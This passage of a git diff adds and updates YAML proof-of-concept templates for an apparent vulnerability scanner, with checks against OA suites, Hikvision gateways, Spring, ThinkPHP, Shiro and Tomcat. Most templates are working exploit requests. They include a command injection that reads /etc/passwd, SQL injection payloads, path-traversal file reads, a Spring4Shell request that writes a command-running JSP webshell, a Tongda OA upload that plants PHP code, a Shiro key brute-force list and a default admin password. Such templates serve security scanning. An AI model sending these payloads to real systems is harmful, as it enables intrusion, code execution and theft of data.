    path: "/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1"
-    headers:
-      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
-      Accept-Encoding: "gzip,deflate"
    expression: |
      response.status == 200 && response.body.bcontains(b"parent.doTestResult")
 detail:
@@ -12,4 +9,4 @@ detail:
  Affected Version: "Hotel Internet Billing & Operation Support System"
  links:
    - http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8
-    
+
--- a/WebScan/pocs/apache-axis-webservice-detect.yml
+++ b/WebScan/pocs/apache-axis-webservice-detect.yml
@@ -0,0 +1,25 @@
+name: poc-yaml-apache-axis-webservice-detect
+sets:
+  path:
+    - services
+    - servlet/AxisaxiServlet
+    - servlet/AxisServlet
+    - services/listServices
+    - services/FreeMarkerService
+    - services/AdminService
+    - axis/services
+    - axis2/services
+    - axis/servlet/AxisServlet
+    - axis2/servlet/AxisServlet
+    - axis2/services/listServices
+    - axis/services/FreeMarkerService
+    - axis/services/AdminService
+rules:
+  - method: GET
+    path: /{{path}}
+    expression: |
+      response.body.bcontains(b"Services") && response.body.bcontains(b'?wsdl"><i>')
+detail:
+  author: AgeloVito
+  links:
+    - https://paper.seebug.org/1489
--- a/WebScan/pocs/backup-file.yml
+++ b/WebScan/pocs/backup-file.yml
@@ -0,0 +1,64 @@
+name: poc-yaml-backup-file
+set:
+  host: request.url.domain
+sets:
+  path:
+    - "sql"
+    - "www"
+    - "wwwroot"
+    - "index"
+    - "backup"
+    - "back"
+    - "data"
+    - "web"
+    - "db"
+    - "database"
+    - "ftp"
+    - "admin"
+    - "upload"
+    - "package"
+    - "sql"
+    - "old"
+    - "test"
+    - "root"
+    - "beifen"
+    - host
+  ext:
+    - "zip"
+    - "7z"
+    - "rar"
+    - "gz"
+    - "tar.gz"
+    - "db"
+    - "bak"
+
+rules:
+  - method: GET
+    path: /{{path}}.{{ext}}
+    follow_redirects: false
+    continue: true
+    expression: |
+      response.content_type.contains("application/") &&
+      (response.body.startsWith("377ABCAF271C".hexdecode()) ||
+      response.body.startsWith("314159265359".hexdecode()) ||
+      response.body.startsWith("53514c69746520666f726d6174203300".hexdecode()) ||
+      response.body.startsWith("1f8b".hexdecode()) ||
+      response.body.startsWith("526172211A0700".hexdecode()) ||
+      response.body.startsWith("FD377A585A0000".hexdecode()) ||
+      response.body.startsWith("1F9D".hexdecode()) ||
+      response.body.startsWith("1FA0".hexdecode()) ||
+      response.body.startsWith("4C5A4950".hexdecode()) ||
+      response.body.startsWith("504B0304".hexdecode()) )
+#      - "377ABCAF271C"  # 7z
+#      - "314159265359"  # bz2
+#      - "53514c69746520666f726d6174203300"  # SQLite format 3.
+#      - "1f8b"  # gz tar.gz
+#      - "526172211A0700"  # rar RAR archive version 1.50
+#      - "526172211A070100"  # rar RAR archive version 5.0
+#      - "FD377A585A0000"  # xz tar.xz
+#      - "1F9D"  # z tar.z
+#      - "1FA0"  # z tar.z
+#      - "4C5A4950"  # lz
+#      - "504B0304"  # zip
+detail:
+  author: shadown1ng(https://github.com/shadown1ng)
--- a/WebScan/pocs/django-CVE-2018-14574.yml
+++ b/WebScan/pocs/django-CVE-2018-14574.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-django-CVE-2018-14574
+
+rules:
+  - method: GET
+    path: //www.example.com
+    follow_redirects: false
+    expression: response.status == 301 && response.headers['location']=="//www.example.com/"
+
+detail:
+    author: ivan
+    links:
+        - https://github.com/vulhub/vulhub/tree/master/django/CVE-2018-14574 
--- a/WebScan/pocs/e-office-v10-sql-inject.yml
+++ b/WebScan/pocs/e-office-v10-sql-inject.yml
@@ -0,0 +1,14 @@
+name: e-office-v10-sql-inject
+rules:
+  - method: GET
+    path: /eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b'<p>未找到相关数据</p>')
+detail:
+  author: Print1n(https://github.com/Print1n)
+  description: |
+    泛微 eoffice v10 前台 SQL 注入
+    FOFA：fid="2csJpuWtfTdSAavIfJTuBw=="
+  links:
+    - https://www.hedysx.com/2777.html
--- a/WebScan/pocs/e-office-v9-upload-cnvd-2021-49104.yml
+++ b/WebScan/pocs/e-office-v9-upload-cnvd-2021-49104.yml
@@ -0,0 +1,22 @@
+name: e-office-v9-upload-cnvd-2021-49104
+set:
+  r1: randomLowercase(8)
+rules:
+  - method: POST
+    path: /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
+    headers:
+      Content-Type: multipart/form-data;boundary=e64bdf16c554bbc109cecef6451c26a4
+    body: |-
+      --e64bdf16c554bbc109cecef6451c26a4
+      Content-Disposition: form-data; name="Filedata"; filename="test.txt"
+      Content-Type: image/jpeg
+      {{r1}}
+      --e64bdf16c554bbc109cecef6451c26a4--
+    expression: response.status == 200  && response.body.bcontains(b"logo-eoffice")
+  - method: GET
+    path: /images/logo/logo-eoffice.txt
+    expression: response.status == 200 && response.body.bcontains(bytes(r1))
+detail:
+  author: szd790056181
+  links:
+    - http://www.ctfiot.com/13682.html
--- a/WebScan/pocs/ezoffice-dpwnloadhttp.jsp-filedownload.yml
+++ b/WebScan/pocs/ezoffice-dpwnloadhttp.jsp-filedownload.yml
@@ -0,0 +1,13 @@
+name: poc-yaml-ezoffice-downloadhttp.jsp-filedownload
+rules:
+  - method: GET
+    path: /defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.headers["filename"].contains("../public/edit/jsp/config.jsp")
+
+detail:
+  author: PeiQi0
+  links:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20downloadhttp.jsp%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
+  tags: ezoffice,file,download
--- a/WebScan/pocs/fckeditor-info.yml
+++ b/WebScan/pocs/fckeditor-info.yml
@@ -0,0 +1,19 @@
+name: poc-yaml-fckeditor-info
+sets:
+  path:
+    - "/fckeditor/_samples/default.html"
+    - "/fckeditor/editor/filemanager/connectors/uploadtest.html"
+    - "/ckeditor/samples/"
+    - "/editor/ckeditor/samples/"
+    - "/ckeditor/samples/sample_posteddata.php"
+    - "/editor/ckeditor/samples/sample_posteddata.php"
+    - "/fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"
+    - "/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php"
+rules:
+  - method: GET
+    path: /{{path}}
+    follow_redirects: false
+    expression: |
+      response.body.bcontains(b'<title>FCKeditor') || response.body.bcontains(b'<title>CKEditor Samples</title>') || response.body.bcontains(b'http://ckeditor.com</a>') || response.body.bcontains(b'Custom Uploader URL:') || response.body.bcontains(b'init_spell()') || response.body.bcontains(b"'tip':'")
+detail:
+  author: shadown1ng(https://github.com/shadown1ng)
--- a/WebScan/pocs/hikvision-gateway-data-file-read.yml
+++ b/WebScan/pocs/hikvision-gateway-data-file-read.yml
@@ -0,0 +1,15 @@
+name: hikvision-gateway-data-file-read
+rules:
+ -  method: GET
+    path: /data/login.php::$DATA
+    expression: |
+      response.status == 200 && response.body.bcontains(b'DataBaseQuery();') && response.body.bcontains(b'$_POST[\'userName\'];') && response.body.bcontains(b'$_POST[\'password\'];')
+info:
+  author: zan8in
+  description: |
+    HIKVISION 视频编码设备接入网关 $DATA 任意文件读取
+    HIKVISION 视频编码设备接入网关存在配置错误特性，特殊后缀请求php文件可读取源码
+    title="视频编码设备接入网关"
+  links:
+    - http://wiki.peiqi.tech/wiki/iot/HIKVISION/HIKVISION%20%E8%A7%86%E9%A2%91%E7%BC%96%E7%A0%81%E8%AE%BE%E5%A4%87%E6%8E%A5%E5%85%A5%E7%BD%91%E5%85%B3%20$DATA%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.html
+
--- a/WebScan/pocs/hikvision-showfile-file-read.yml
+++ b/WebScan/pocs/hikvision-showfile-file-read.yml
@@ -0,0 +1,13 @@
+name: hikvision-showfile-file-read
+rules:
+ - method: GET
+   path: /serverLog/showFile.php?fileName=../web/html/main.php
+   expression: |
+      response.status == 200 && response.body.bcontains(b'$_SERVER[\'HTTP_HOST\'];') && response.body.bcontains(b'$_POST[\'userName\'];')
+info:
+  author: zan8in
+  description: |
+    海康威视视频接入网关系统在页面/serverLog/showFile.php的参数fileName存在任意文件下载漏洞
+    title="视频编码设备接入网关"
+  links:
+    - http://wiki.peiqi.tech/wiki/iot/HIKVISION/HIKVISION%20%E8%A7%86%E9%A2%91%E7%BC%96%E7%A0%81%E8%AE%BE%E5%A4%87%E6%8E%A5%E5%85%A5%E7%BD%91%E5%85%B3%20showFile.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.html
--- a/WebScan/pocs/sangfor-ad-download.php-filedownload.yml
+++ b/WebScan/pocs/sangfor-ad-download.php-filedownload.yml
@@ -0,0 +1,13 @@
+name: poc-yaml-sangfor-ad-download.php-filedownload
+rules:
+  - method: GET
+    path: /report/download.php?pdf=../../../../../etc/hosts
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b'localhost') && response.headers['Content-Disposition'].contains('hosts')
+
+detail:
+  author: PeiQi0
+  links:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E6%8A%A5%E8%A1%A8%E7%B3%BB%E7%BB%9F%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+  tags: sangfor,file,download
--- a/WebScan/pocs/seeyon-oa-a8-m-information-disclosure.yml
+++ b/WebScan/pocs/seeyon-oa-a8-m-information-disclosure.yml
@@ -0,0 +1,18 @@
+name: poc-yaml-seeyon-oa-a8-m-information-disclosure
+manual: true
+transport: http
+rules:
+  - method: GET
+    path: /seeyon/management/index.jsp
+    expression: response.status == 200
+  - method: POST
+    path: /seeyon/management/index.jsp
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: password=WLCCYBD%40SEEYON
+    follow_redirects: true
+    expression: response.status == 200 && response.body.bcontains(bytes("Free Physical Memory Size"))
+detail:
+  author: Monday
+  links:
+    - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
--- a/WebScan/pocs/shiro-key.yml
+++ b/WebScan/pocs/shiro-key.yml
@@ -0,0 +1,155 @@
+name: poc-yaml-shiro-key
+set:
+  randstr: randomUppercase(32)
+sets:
+  key:
+    - "kPH+bIxk5D2deZiIxcaaaA=="
+    - "2AvVhdsgUs0FSA3SDFAdag=="
+    - "3AvVhmFLUs0KTA3Kprsdag=="
+    - "4AvVhmFLUs0KTA3Kprsdag=="
+    - "5aaC5qKm5oqA5pyvAAAAAA=="
+    - "6ZmI6I2j5Y+R5aSn5ZOlAA=="
+    - "bWljcm9zAAAAAAAAAAAAAA=="
+    - "wGiHplamyXlVB11UXWol8g=="
+    - "Z3VucwAAAAAAAAAAAAAAAA=="
+    - "MTIzNDU2Nzg5MGFiY2RlZg=="
+    - "zSyK5Kp6PZAAjlT+eeNMlg=="
+    - "U3ByaW5nQmxhZGUAAAAAAA=="
+    - "5AvVhmFLUs0KTA3Kprsdag=="
+    - "bXdrXl9eNjY2KjA3Z2otPQ=="
+    - "fCq+/xW488hMTCD+cmJ3aQ=="
+    - "1QWLxg+NYmxraMoxAXu/Iw=="
+    - "ZUdsaGJuSmxibVI2ZHc9PQ=="
+    - "L7RioUULEFhRyxM7a2R/Yg=="
+    - "r0e3c16IdVkouZgk1TKVMg=="
+    - "bWluZS1hc3NldC1rZXk6QQ=="
+    - "a2VlcE9uR29pbmdBbmRGaQ=="
+    - "WcfHGU25gNnTxTlmJMeSpw=="
+    - "ZAvph3dsQs0FSL3SDFAdag=="
+    - "tiVV6g3uZBGfgshesAQbjA=="
+    - "cmVtZW1iZXJNZQAAAAAAAA=="
+    - "ZnJlc2h6Y24xMjM0NTY3OA=="
+    - "RVZBTk5JR0hUTFlfV0FPVQ=="
+    - "WkhBTkdYSUFPSEVJX0NBVA=="
+    - "GsHaWo4m1eNbE0kNSMULhg=="
+    - "l8cc6d2xpkT1yFtLIcLHCg=="
+    - "KU471rVNQ6k7PQL4SqxgJg=="
+    - "0AvVhmFLUs0KTA3Kprsdag=="
+    - "1AvVhdsgUs0FSA3SDFAdag=="
+    - "25BsmdYwjnfcWmnhAciDDg=="
+    - "3JvYhmBLUs0ETA5Kprsdag=="
+    - "6AvVhmFLUs0KTA3Kprsdag=="
+    - "6NfXkC7YVCV5DASIrEm1Rg=="
+    - "7AvVhmFLUs0KTA3Kprsdag=="
+    - "8AvVhmFLUs0KTA3Kprsdag=="
+    - "8BvVhmFLUs0KTA3Kprsdag=="
+    - "9AvVhmFLUs0KTA3Kprsdag=="
+    - "OUHYQzxQ/W9e/UjiAGu6rg=="
+    - "a3dvbmcAAAAAAAAAAAAAAA=="
+    - "aU1pcmFjbGVpTWlyYWNsZQ=="
+    - "bXRvbnMAAAAAAAAAAAAAAA=="
+    - "OY//C4rhfwNxCQAQCrQQ1Q=="
+    - "5J7bIJIV0LQSN3c9LPitBQ=="
+    - "f/SY5TIve5WWzT4aQlABJA=="
+    - "bya2HkYo57u6fWh5theAWw=="
+    - "WuB+y2gcHRnY2Lg9+Aqmqg=="
+    - "3qDVdLawoIr1xFd6ietnwg=="
+    - "YI1+nBV//m7ELrIyDHm6DQ=="
+    - "6Zm+6I2j5Y+R5aS+5ZOlAA=="
+    - "2A2V+RFLUs+eTA3Kpr+dag=="
+    - "6ZmI6I2j3Y+R1aSn5BOlAA=="
+    - "SkZpbmFsQmxhZGUAAAAAAA=="
+    - "2cVtiE83c4lIrELJwKGJUw=="
+    - "fsHspZw/92PrS3XrPW+vxw=="
+    - "XTx6CKLo/SdSgub+OPHSrw=="
+    - "sHdIjUN6tzhl8xZMG3ULCQ=="
+    - "O4pdf+7e+mZe8NyxMTPJmQ=="
+    - "HWrBltGvEZc14h9VpMvZWw=="
+    - "rPNqM6uKFCyaL10AK51UkQ=="
+    - "Y1JxNSPXVwMkyvES/kJGeQ=="
+    - "lT2UvDUmQwewm6mMoiw4Ig=="
+    - "MPdCMZ9urzEA50JDlDYYDg=="
+    - "xVmmoltfpb8tTceuT5R7Bw=="
+    - "c+3hFGPjbgzGdrC+MHgoRQ=="
+    - "ClLk69oNcA3m+s0jIMIkpg=="
+    - "Bf7MfkNR0axGGptozrebag=="
+    - "1tC/xrDYs8ey+sa3emtiYw=="
+    - "ZmFsYWRvLnh5ei5zaGlybw=="
+    - "cGhyYWNrY3RmREUhfiMkZA=="
+    - "IduElDUpDDXE677ZkhhKnQ=="
+    - "yeAAo1E8BOeAYfBlm4NG9Q=="
+    - "cGljYXMAAAAAAAAAAAAAAA=="
+    - "2itfW92XazYRi5ltW0M2yA=="
+    - "XgGkgqGqYrix9lI6vxcrRw=="
+    - "ertVhmFLUs0KTA3Kprsdag=="
+    - "5AvVhmFLUS0ATA4Kprsdag=="
+    - "s0KTA3mFLUprK4AvVhsdag=="
+    - "hBlzKg78ajaZuTE0VLzDDg=="
+    - "9FvVhtFLUs0KnA3Kprsdyg=="
+    - "d2ViUmVtZW1iZXJNZUtleQ=="
+    - "yNeUgSzL/CfiWw1GALg6Ag=="
+    - "NGk/3cQ6F5/UNPRh8LpMIg=="
+    - "4BvVhmFLUs0KTA3Kprsdag=="
+    - "MzVeSkYyWTI2OFVLZjRzZg=="
+    - "empodDEyMwAAAAAAAAAAAA=="
+    - "A7UzJgh1+EWj5oBFi+mSgw=="
+    - "c2hpcm9fYmF0aXMzMgAAAA=="
+    - "i45FVt72K2kLgvFrJtoZRw=="
+    - "U3BAbW5nQmxhZGUAAAAAAA=="
+    - "Jt3C93kMR9D5e8QzwfsiMw=="
+    - "MTIzNDU2NzgxMjM0NTY3OA=="
+    - "vXP33AonIp9bFwGl7aT7rA=="
+    - "V2hhdCBUaGUgSGVsbAAAAA=="
+    - "Q01TX0JGTFlLRVlfMjAxOQ=="
+    - "Is9zJ3pzNh2cgTHB4ua3+Q=="
+    - "NsZXjXVklWPZwOfkvk6kUA=="
+    - "GAevYnznvgNCURavBhCr1w=="
+    - "66v1O8keKNV3TTcGPK1wzg=="
+    - "SDKOLKn2J1j/2BHjeZwAoQ=="
+    - "kPH+bIxk5D2deZiIxcabaA=="
+    - "kPH+bIxk5D2deZiIxcacaA=="
+    - "3AvVhdAgUs0FSA4SDFAdBg=="
+    - "4AvVhdsgUs0F563SDFAdag=="
+    - "FL9HL9Yu5bVUJ0PDU1ySvg=="
+    - "5RC7uBZLkByfFfJm22q/Zw=="
+    - "eXNmAAAAAAAAAAAAAAAAAA=="
+    - "fdCEiK9YvLC668sS43CJ6A=="
+    - "FJoQCiz0z5XWz2N2LyxNww=="
+    - "HeUZ/LvgkO7nsa18ZyVxWQ=="
+    - "HoTP07fJPKIRLOWoVXmv+Q=="
+    - "iycgIIyCatQofd0XXxbzEg=="
+    - "m0/5ZZ9L4jjQXn7MREr/bw=="
+    - "NoIw91X9GSiCrLCF03ZGZw=="
+    - "oPH+bIxk5E2enZiIxcqaaA=="
+    - "QAk0rp8sG0uJC4Ke2baYNA=="
+    - "Rb5RN+LofDWJlzWAwsXzxg=="
+    - "s2SE9y32PvLeYo+VGFpcKA=="
+    - "SrpFBcVD89eTQ2icOD0TMg=="
+    - "U0hGX2d1bnMAAAAAAAAAAA=="
+    - "Us0KvVhTeasAm43KFLAeng=="
+    - "Ymx1ZXdoYWxlAAAAAAAAAA=="
+    - "YWJjZGRjYmFhYmNkZGNiYQ=="
+    - "zIiHplamyXlVB11UXWol8g=="
+    - "ZjQyMTJiNTJhZGZmYjFjMQ=="
+  mode:
+    - "cbc"
+    - "gcm"
+  payload:
+    - shirokey(key,mode)
+rules:
+  - method: GET
+    path: /
+    follow_redirects: false
+    headers:
+      Cookie: JSESSIONID={{randstr}};rememberMe=login
+    expression: |
+      "Set-Cookie" in response.headers && (response.headers["Set-Cookie"].contains("rememberMe=") || response.headers["Set-Cookie"].contains("=deleteMe"))
+  - method: GET
+    path: /
+    headers:
+      Cookie: JSESSIONID={{randstr}};rememberMe={{payload}}
+    follow_redirects: false
+    expression: |
+      !response.headers["Set-Cookie"].contains("rememberMe=")
+detail:
+  author: shadown1ng(https://github.com/shadown1ng)
--- a/WebScan/pocs/spring-core-rce.yml
+++ b/WebScan/pocs/spring-core-rce.yml
@@ -0,0 +1,27 @@
+name: poc-yaml-spring-core-rce
+manual: true
+transport: http
+set:
+    r1: randomInt(40000, 44800)
+rules:
+  - method: POST
+    path: /
+    headers:
+        suffix: "%>//"
+        c1: "Runtime"
+        c2: "<%"
+        DNT: "1"
+        Content-Type: "application/x-www-form-urlencoded"
+    body: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22data%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22word%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
+    follow_redirects: true
+    expression: |
+        response.status == 200 
+  - method: GET
+    path: /tomcatwar.jsp?data=j&word=echo%20{r1}
+    follow_redirects: false
+    expression: |
+        response.status == 200 && response.body.bcontains(bytes(string(r1)))
+detail:
+    author: marmot
+    links:
+        - https://github.com/Mr-xn/spring-core-rce
--- a/WebScan/pocs/springboot-cve-2021-21234.yml
+++ b/WebScan/pocs/springboot-cve-2021-21234.yml
@@ -0,0 +1,22 @@
+name: poc-yaml-springboot-cve-2021-21234
+groups:
+  spring1:
+    - method: GET
+      path: /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
+      expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts")
+  spring2:
+    - method: GET
+      path: /log/view?filename=/windows/win.ini&base=../../../../../../../../../../
+      expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts")
+  spring3:
+    - method: GET
+      path: /manage/log/view?filename=/etc/hosts&base=../../../../../../../../../../
+      expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost")
+  spring4:
+    - method: GET
+      path: /log/view?filename=/etc/hosts&base=../../../../../../../../../../
+      expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost")
+detail:
+  author: iak3ec(https://github.com/nu0l)
+  links:
+    - https://mp.weixin.qq.com/s/ZwhBEz2ek26Zf3F-csoRgQ
--- a/WebScan/pocs/sql-file.yml
+++ b/WebScan/pocs/sql-file.yml
@@ -0,0 +1,32 @@
+name: poc-yaml-sql-file
+set:
+  host: request.url.domain
+sets:
+  path:
+    - "1.sql"
+    - "backup.sql"
+    - "database.sql"
+    - "data.sql"
+    - "db_backup.sql"
+    - "dbdump.sql"
+    - "db.sql"
+    - "dump.sql"
+    - "{{host}}.sql"
+    - "{{host}}_db.sql"
+    - "localhost.sql"
+    - "mysqldump.sql"
+    - "mysql.sql"
+    - "site.sql"
+    - "sql.sql"
+    - "temp.sql"
+    - "translate.sql"
+    - "users.sql"
+rules:
+  - method: GET
+    path: /{{path}}
+    follow_redirects: false
+    continue: true
+    expression: |
+      "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO".bmatches(response.body)
+detail:
+  author: shadown1ng(https://github.com/shadown1ng)
--- a/WebScan/pocs/swagger-ui-unauth.yml
+++ b/WebScan/pocs/swagger-ui-unauth.yml
@@ -1,6 +1,7 @@
 name: poc-yaml-swagger-ui-unauth
 sets:
  path:
+    - swagger/ui/index
    - swagger-ui.html
    - api/swagger-ui.html
    - service/swagger-ui.html
@@ -9,11 +10,20 @@ sets:
    - actuator/swagger-ui.html
    - libs/swagger-ui.html
    - template/swagger-ui.html
+    - api_docs
+    - api/docs/
+    - api/index.html
+    - swagger/v1/swagger.yaml
+    - swagger/v1/swagger.json
+    - swagger.yaml
+    - swagger.json
+    - api-docs/swagger.yaml
+    - api-docs/swagger.json
 rules:
  - method: GET
    path: /{{path}}
    expression: |
-      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+      response.status == 200 && (response.body.bcontains(b"Swagger UI") || response.body.bcontains(b"swagger-ui.min.js")|| response.body.bcontains(b'swagger:') || response.body.bcontains(b'swagger:') || response.body.bcontains(b'Swagger 2.0') ||  response.body.bcontains(b"\"swagger\":") )
 detail:
  author: AgeloVito
  links:
--- a/WebScan/pocs/thinkphp5023-method-rce.yml
+++ b/WebScan/pocs/thinkphp5023-method-rce.yml
@@ -1,6 +1,4 @@
 name: poc-yaml-thinkphp5023-method-rce
-set:
-  rand: randomLowercase(10)
 groups:
  poc1:
  - method: POST
@@ -8,9 +6,9 @@ groups:
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
-      _method=__construct&filter[]=var_dump&method=GET&get[]={{rand}}
+      _method=__construct&filter[]=printf&method=GET&get[]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu
    expression: |
-      response.body.bcontains(bytes(rand))
+      response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu")
  poc2:
  - method: POST
    path: /index.php?s=captcha
--- a/WebScan/pocs/tomcat-manager-weak.yml
+++ b/WebScan/pocs/tomcat-manager-weak.yml
@@ -6,9 +6,9 @@ sets:
    - root
    - manager
  password:
+    - tomcat
    - ""
    - admin
-    - tomcat
    - 123456
    - root
  payload:
--- a/WebScan/pocs/tongda-insert-sql-inject.yml
+++ b/WebScan/pocs/tongda-insert-sql-inject.yml
@@ -0,0 +1,21 @@
+name: tongda-insert-sql-inject
+rules:
+  - method: POST
+    path: /general/document/index.php/recv/register/insert
+    body: |
+      title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
+    expression: response.status == 302 && response.headers["set-cookie"].contains("PHPSESSID=")
+  - method: POST
+    path: /general/document/index.php/recv/register/insert
+    body: |
+      title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),8,1))<66,1,710)))# =1&_SERVER=
+    expression: response.status != 502 && response.status != 500
+detail:
+  author: zan8in
+  description: |
+    通达OA v11.6 insert参数包含SQL注入漏洞，攻击者通过漏洞可获取数据库敏感信息
+    app="TDXK-通达OA"
+    发送请求包判断漏洞 /general/document/index.php/recv/register/insert 返回302则是存在漏洞，返回500则不存在
+  links:
+    - http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
+    - https://blog.csdn.net/weixin_39779975/article/details/111091529
--- a/WebScan/pocs/tongda-meeting-unauthorized-access.yml
+++ b/WebScan/pocs/tongda-meeting-unauthorized-access.yml
@@ -3,9 +3,6 @@ rules:
  - method: GET
    path: >-
      /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay
-    headers:
-      User-Agent: 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'
-      Accept-Encoding: 'deflate'
    follow_redirects: false
    expression: |
      response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string("creator"))) && response.body.bcontains(bytes(string("originalTitle")))
--- a/WebScan/pocs/tongda-oa-v11.9-api.ali.php-upload.yml
+++ b/WebScan/pocs/tongda-oa-v11.9-api.ali.php-upload.yml
@@ -0,0 +1,41 @@
+name: poc-yaml-tongda-oa-v11.9-api.ali.php-fileupload
+set:
+  filename: randomLowercase(8)
+  r1: randomLowercase(8)
+  payload: base64("file_put_contents('../../"+filename+".php','<?php echo(md5("+r1+"));?>');")
+  rboundary: md5(randomLowercase(8))
+  date: TDdate()
+rules:
+  - method: POST
+    path: /mobile/api/api.ali.php
+    headers:
+      Content-Type: multipart/form-data; boundary={{rboundary}}
+      Accept-Encoding: gzip
+    follow_redirects: false
+    body: "\
+      --{{rboundary}}\r\n\
+      Content-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.json\"\r\n\
+      Content-Type: application/octet-stream\r\n\
+      \r\n\
+      {\"modular\":\"AllVariable\",\"a\":\"{{payload}}\",\"dataAnalysis\":\"{\\\"a\\\":\\\"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*\\\"}\"}\r\n\
+      --{{rboundary}}--\r\n\
+      "
+    expression: |
+      response.status == 200
+
+  - method: GET
+    path: /inc/package/work.php?id=../../../../../myoa/attach/approve_center/{{date}}/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.{{filename}}
+    expression: |
+      response.status == 200 && response.body.bcontains(b'OK')
+
+  - method: GET
+    path: /{{filename}}.php
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(r1)))
+
+detail:
+  author: PeiQi0
+  influence_version: "<= 通达OA 11.9"
+  links:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.8%20api.ali.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
+  tags: tongda,fileupload
--- a/WebScan/pocs/tongda-user-session-disclosure.yml
+++ b/WebScan/pocs/tongda-user-session-disclosure.yml
@@ -1,17 +1,13 @@
-name: poc-yaml-tongda-user-session-disclosure
+name: tongda-user-session-disclosure
 rules:
  - method: GET
-    path: /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
-    follow_redirects: false
-    expression: "true"
-
-  - method: POST
-    path: /general/userinfo.php?UID=1
-    follow_redirects: false
-    expression: |
-      response.status == 200 && response.body.bcontains(b"\"dept_name\":\"") && response.body.bcontains(b"\"online_flag\":") && response.headers["Content-Type"].contains("application/json")
-
+    path: /mobile/auth_mobi.php?isAvatar=1&uid=11121212121212&P_VER=0
+    expression: response.body.bcontains(b'RELOGIN') && response.status == 200
 detail:
-  author: kzaopa(https://github.com/kzaopa)
-  links:
-    - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ
+    author: kzaopa(https://github.com/kzaopa)
+    description: |
